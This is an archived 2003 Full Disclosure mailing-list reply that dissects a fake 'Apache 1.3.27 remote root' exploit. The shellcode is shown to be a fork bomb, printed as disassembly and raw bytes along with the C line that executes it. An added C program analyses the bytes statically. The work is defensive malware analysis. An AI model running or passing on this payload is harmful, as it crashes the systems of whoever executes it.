Full Disclosure mailing list archives

Re: Apache 1.3.27 Remote Root 0-Day


From: Joe Stewart <jstewart () lurhq com>
Date: Fri, 20 Jun 2003 13:04:52 -0400

On Friday 20 June 2003 11:15 am, Michael wrote:
> Maybe now we can STFU and concentrate on actual disclosure?
> I'm curious as to why there has been no discussion about this apache
> report.
>
> The poster of this message didn't include any info on the details of the
> problem nor an exploit, which leaves us wondering.  (The insult was cute
> though)

There was exploit code included in the message I got. Taking apart the
shellcode we see:

   0:   31 db                   xor    %ebx,%ebx
   2:   31 c0                   xor    %eax,%eax
   4:   31 d2                   xor    %edx,%edx
   6:   b2 18                   mov    $0x18,%dl 
   8:   68 20 3f 21 0a          push   $0xa213f20        ; " ?!\n"
   d:   68 54 52 31 58          push   $0x58315254      ; "TR1X"
  12:   68 65 20 4d 34          push   $0x344d2065      ; "e M4"
  17:   68 73 20 54 68          push   $0x68542073      ; "s Th"
  1c:   68 61 74 20 69          push   $0x69207461      ; "at i"
  21:   68 2d 2d 57 68          push   $0x68572d2d      ; "--Wh"
  26:   89 e1                   mov    %esp,%ecx        ; pointer to string
  28:   b0 04                   mov    $0x4,%al
  2a:   cd 80                   int    $0x80            ; syscall_write
  2c:   b8 02 00 00 00          mov    $0x2,%eax
  31:   cd 80                   int    $0x80            ; syscall_fork
  33:   eb f7                   jmp    0x2c     ; loop
... garbage code follows

So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" 
over and over until the system can no longer fork processes.

Looking at the C code, we see this line:
void(*b)()=(void*)shellcode;b();

Which executes the shellcode locally. In other words, don't run this.

-Joe

-- 
Joe Stewart, GCIH 
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
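The analysis above was done by reading the disassembly rather than running the code, which is the right call for an unknown payload. As an added example (not part of Joe's post and not the exploit's own code), the C program below does the same thing mechanically: it walks the 53 bytes transcribed from the listing, tracks only eax/edx and the push immediates, reassembles the string in stack order, records the eax value at each int 0x80 (4 = write, 2 = fork on Linux/x86) and where the short jmp lands, and flags the fork-in-a-backward-loop pattern. Only the opcodes this sample uses are decoded, the trailing bytes Joe calls "garbage code" are not on the page and are not included, and nothing is ever executed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 53 shellcode bytes, transcribed from the disassembly in the post. */
static const uint8_t sample_shellcode[] = {
    0x31,0xdb, 0x31,0xc0, 0x31,0xd2, 0xb2,0x18,
    0x68,0x20,0x3f,0x21,0x0a, 0x68,0x54,0x52,0x31,0x58,
    0x68,0x65,0x20,0x4d,0x34, 0x68,0x73,0x20,0x54,0x68,
    0x68,0x61,0x74,0x20,0x69, 0x68,0x2d,0x2d,0x57,0x68,
    0x89,0xe1, 0xb0,0x04, 0xcd,0x80,
    0xb8,0x02,0x00,0x00,0x00, 0xcd,0x80,
    0xeb,0xf7
};

struct analysis {
    char str[64];       /* bytes pushed with push imm32, in memory order */
    int  syscalls[16];  /* eax at each int 0x80: 4 = write, 2 = fork (Linux/x86) */
    int  nsyscalls;
    int  write_len;     /* edx at the write syscall, -1 if none */
    int  fork_offset;   /* offset of the int 0x80 that forks, -1 if none */
    int  jmp_target;    /* offset a short jmp lands on, -1 if none */
    int  decoded_all;   /* 1 if every byte was consumed by a known opcode */
};

static uint32_t rd32(const uint8_t *p)
{
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* One pass over the bytes. Only the opcodes this sample uses are decoded;
   an unknown opcode stops the walk. Nothing is executed. */
static void analyze(const uint8_t *code, size_t len, struct analysis *a)
{
    uint32_t eax = 0, edx = 0, pushes[16];
    int npush = 0;
    size_t ip = 0;

    memset(a, 0, sizeof *a);
    a->write_len = a->fork_offset = a->jmp_target = -1;

    while (ip < len) {
        uint8_t op = code[ip];
        if (op == 0x31 && ip + 1 < len) {            /* xor r/m32,r32 */
            if (code[ip+1] == 0xc0) eax = 0;         /* xor eax,eax */
            if (code[ip+1] == 0xd2) edx = 0;         /* xor edx,edx */
            ip += 2;
        } else if (op == 0x89 && ip + 1 < len) {     /* mov r/m32,r32 (esp -> ecx) */
            ip += 2;
        } else if (op == 0xb0 && ip + 1 < len) {     /* mov al,imm8 */
            eax = (eax & 0xffffff00u) | code[ip+1];
            ip += 2;
        } else if (op == 0xb2 && ip + 1 < len) {     /* mov dl,imm8 */
            edx = (edx & 0xffffff00u) | code[ip+1];
            ip += 2;
        } else if (op == 0xb8 && ip + 4 < len) {     /* mov eax,imm32 */
            eax = rd32(code + ip + 1);
            ip += 5;
        } else if (op == 0x68 && ip + 4 < len) {     /* push imm32 */
            if (npush < 16) pushes[npush++] = rd32(code + ip + 1);
            ip += 5;
        } else if (op == 0xcd && ip + 1 < len && code[ip+1] == 0x80) { /* int 0x80 */
            if (a->nsyscalls < 16) a->syscalls[a->nsyscalls++] = (int)eax;
            if (eax == 4) a->write_len = (int)edx;
            if (eax == 2) a->fork_offset = (int)ip;
            ip += 2;
        } else if (op == 0xeb && ip + 1 < len) {     /* jmp rel8 */
            a->jmp_target = (int)(ip + 2) + (int8_t)code[ip+1];
            ip += 2;
            break;  /* following the jump would loop forever; stop here */
        } else {
            break;  /* unknown opcode: decoded_all stays 0 */
        }
    }
    a->decoded_all = (ip == len);

    /* The last push sits at the lowest address, so the string reads from the
       last pushed dword back to the first, little-endian within each dword. */
    size_t pos = 0;
    for (int i = npush - 1; i >= 0 && pos + 4 < sizeof a->str; i--)
        for (int k = 0; k < 4; k++) a->str[pos++] = (char)(pushes[i] >> (8 * k));
    a->str[pos] = '\0';
}

/* Fork bomb signature: a fork syscall that a backward jump re-enters. */
static int is_fork_bomb(const struct analysis *a)
{
    return a->fork_offset >= 0 && a->jmp_target >= 0 && a->jmp_target <= a->fork_offset;
}

static const struct analysis *sample_analysis(void)
{
    static struct analysis a;
    analyze(sample_shellcode, sizeof sample_shellcode, &a);
    return &a;
}

int main(void)
{
    const struct analysis *a = sample_analysis();
    printf("string (%d bytes, write length %d): %s",
           (int)strlen(a->str), a->write_len, a->str);
    for (int i = 0; i < a->nsyscalls; i++) printf("syscall eax=%d\n", a->syscalls[i]);
    printf("jmp target 0x%x, decoded all %d, fork bomb %d\n",
           a->jmp_target, a->decoded_all, is_fork_bomb(a));
    return 0;
}
```

The recovered string is "--What is The M4TR1X ?!\n", and its 24-byte length matches the mov $0x18,%dl that sets up the write count. The jmp target comes out as 0x2c, the mov $0x2,%eax that precedes the second int 0x80, so the loop body is the fork. Replace the byte array with any other small payload that uses the same handful of opcodes and the walker will report the same facts without the payload ever being mapped executable.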